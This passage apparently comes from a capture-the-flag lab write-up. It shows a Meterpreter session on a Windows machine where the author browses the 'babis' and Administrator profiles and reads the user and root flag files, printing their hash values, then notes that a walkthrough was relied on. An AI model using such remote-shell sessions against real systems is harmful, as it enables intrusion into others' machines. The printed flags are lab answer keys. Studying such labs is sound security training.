40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  My Documents
100666/rw-rw-rw-  524288  fil   2017-03-17 10:17:40 -0400  NTUSER.DAT
100666/rw-rw-rw-  65536   fil   2017-03-17 10:17:40 -0400  NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
100666/rw-rw-rw-  524288  fil   2017-03-17 10:17:40 -0400  NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288  fil   2017-03-17 10:17:40 -0400  NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  NetHood
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:40 -0400  Pictures
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  PrintHood
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  Recent
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:40 -0400  Saved Games
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:52 -0400  Searches
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  SendTo
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-17 10:17:40 -0400  Templates
40555/r-xr-xr-x   0       dir   2017-03-17 10:17:40 -0400  Videos
100666/rw-rw-rw-  262144  fil   2017-03-17 10:17:40 -0400  ntuser.dat.LOG1
100666/rw-rw-rw-  0       fil   2017-03-17 10:17:40 -0400  ntuser.dat.LOG2
100666/rw-rw-rw-  20      fil   2017-03-17 10:17:40 -0400  ntuser.ini

meterpreter > cd Desktop 
lsmeterpreter > ls
Listing: c:\Users\babis\Desktop
===============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2017-03-17 10:17:51 -0400  desktop.ini
100444/r--r--r--  32    fil   2017-03-17 19:14:21 -0400  user.txt.txt

meterpreter > cat user.txt.txt 
9ecdd6a3aedf24b41562fea70f4cb3e8meterpreter > cd ..
meterpreter > cd ..
meterpreter > ls
Listing: c:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   8192  dir   2017-03-17 19:16:43 -0400  Administrator
40777/rwxrwxrwx   0     dir   2009-07-14 00:53:55 -0400  All Users
40777/rwxrwxrwx   8192  dir   2017-03-17 19:06:26 -0400  Classic .NET AppPool
40555/r-xr-xr-x   8192  dir   2009-07-13 22:37:05 -0400  Default
40777/rwxrwxrwx   0     dir   2009-07-14 00:53:55 -0400  Default User
40555/r-xr-xr-x   4096  dir   2009-07-13 22:37:05 -0400  Public
40777/rwxrwxrwx   8192  dir   2017-03-17 10:17:37 -0400  babis
100666/rw-rw-rw-  174   fil   2009-07-14 00:41:57 -0400  desktop.ini

meterpreter > cd Administrator 
cdmeterpreter > cd Desktop 
ls
meterpreter > ls
caListing: c:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2017-03-17 19:16:53 -0400  desktop.ini
100444/r--r--r--  32    fil   2017-03-17 19:17:20 -0400  root.txt.txt

meterpreter > cat root.txt.txt 
e621a0b5041708797c4fc4728bc72b4bmeterpreter > 

I relied on the walkthrough for much of this,
but in the end I learned a great deal, so it was worthwhile.


That's all.